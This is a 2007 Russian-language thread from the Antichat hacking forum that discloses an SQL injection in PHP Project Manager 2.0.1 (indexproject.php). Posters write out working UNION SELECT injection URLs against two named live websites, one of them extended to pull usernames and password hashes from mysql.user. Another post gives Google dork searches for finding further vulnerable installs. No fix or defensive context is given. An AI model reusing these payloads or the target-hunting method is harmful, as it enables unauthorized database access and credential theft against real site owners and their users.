Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
sql inj PHP Project Manager => 2.0.1 |
23.03.2007, 13:09
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
sql inj PHP Project Manager => 2.0.1
изначально уязвимость предполагалось для того чтобы меня взяли в моа, но т.к. меня послали - я её выкладываю.
PHP Project Manager
версия => 2.0.1
описание:
Уязвимость существует в сценарии indexproject.php из-за недостаточной обработки входных данных.
пример:
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/*
на секлабе баги нету(ну и вроде в др местах тоже) |
|
|
23.03.2007, 13:25
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
хэк=)
|
|
|
|
23.03.2007, 22:08
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816
Репутация:
181
|
|
Молодец, правда скрипт не популярен, не думаю что в МОА было бы комуто интересно...
 |
|
|
|
23.03.2007, 22:16
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
|
|
|
|
23.03.2007, 22:21
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
Сообщение от Rebz
и это все??? нда, коварно..
я думал ты хоть подобрал названия таблиц..
зачем? я же просто привёл пример.. и только-то..
|
|
|
|
23.03.2007, 22:23
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..
Последний раз редактировалось n1†R0x; 24.03.2007 в 22:52..
|
|
|
|
25.03.2007, 11:15
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
Сообщение от n1†R0x
мде =\
Код:
http://www.ia.unc.edu/dev/manager/indexproject.php?id=-35+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
это в sqlz можно..
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
|
|
|
|
25.03.2007, 11:20
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от \6/
понимаеш в чём разница.. когда скуля на самописном сайте - это одно, а когда в движке, это другое.
порой самописные сайты бывают лучше защищены, чем средние Cms.
я понял твою мысль..
|
|
|
|
25.03.2007, 12:34
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
ну вот и хорошо
следующий.. |
|
|
|
25.03.2007, 12:47
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
я 
Строка для поиска в гугл: inurl:indexproject.php?id
Мдя, не густо:
Код:
http://www.google.ru/search?hl=ru&q=inurl%3Aindexproject.php%3Fid&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
и так тоже:
Код:
http://www.google.ru/search?hl=ru&newwindow=1&q=%22PHP+Project+Manager+2.0.1%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
Ну да, скуль есть:
Код:
http://www.nuevoparadigma.com/proyectos/indexproject.php?id=-1+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
PHP Project Manager 2.0.1 © 2004 - www.jomier.com
тока двиг не популярный...
Последний раз редактировалось -=lebed=-; 25.03.2007 в 13:08..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
